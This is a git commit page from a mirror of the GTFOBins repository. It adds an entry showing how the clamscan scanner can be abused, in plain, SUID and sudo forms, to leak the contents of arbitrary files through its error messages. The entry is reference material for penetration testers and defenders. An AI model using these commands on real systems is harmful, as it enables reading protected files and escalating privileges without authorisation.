1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add clamscan

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
pad0van 2023-09-02 15:51:45 +08:00 committed by GitHub
parent 2cf1a72bc5
commit 5b93637ab4
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

22
_gtfobins/clamscan.md Normal file
View File

@ -0,0 +1,22 @@
---
description: Each line of the file is interpreted as a path and the content is leaked via error messages, thus this might not be suitable to read binary files. The output can optionally be cleaned using `sed`.
functions:
file-read:
- code: |
LFILE=file_to_read
TF=$(mktemp -d)
touch $TF/empty.yara
clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\1/p'
suid:
- code: |
LFILE=file_to_read
TF=$(mktemp -d)
touch $TF/empty.yara
./clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\1/p'
sudo:
- code: |
LFILE=file_to_read
TF=$(mktemp -d)
touch $TF/empty.yara
sudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\1/p'
---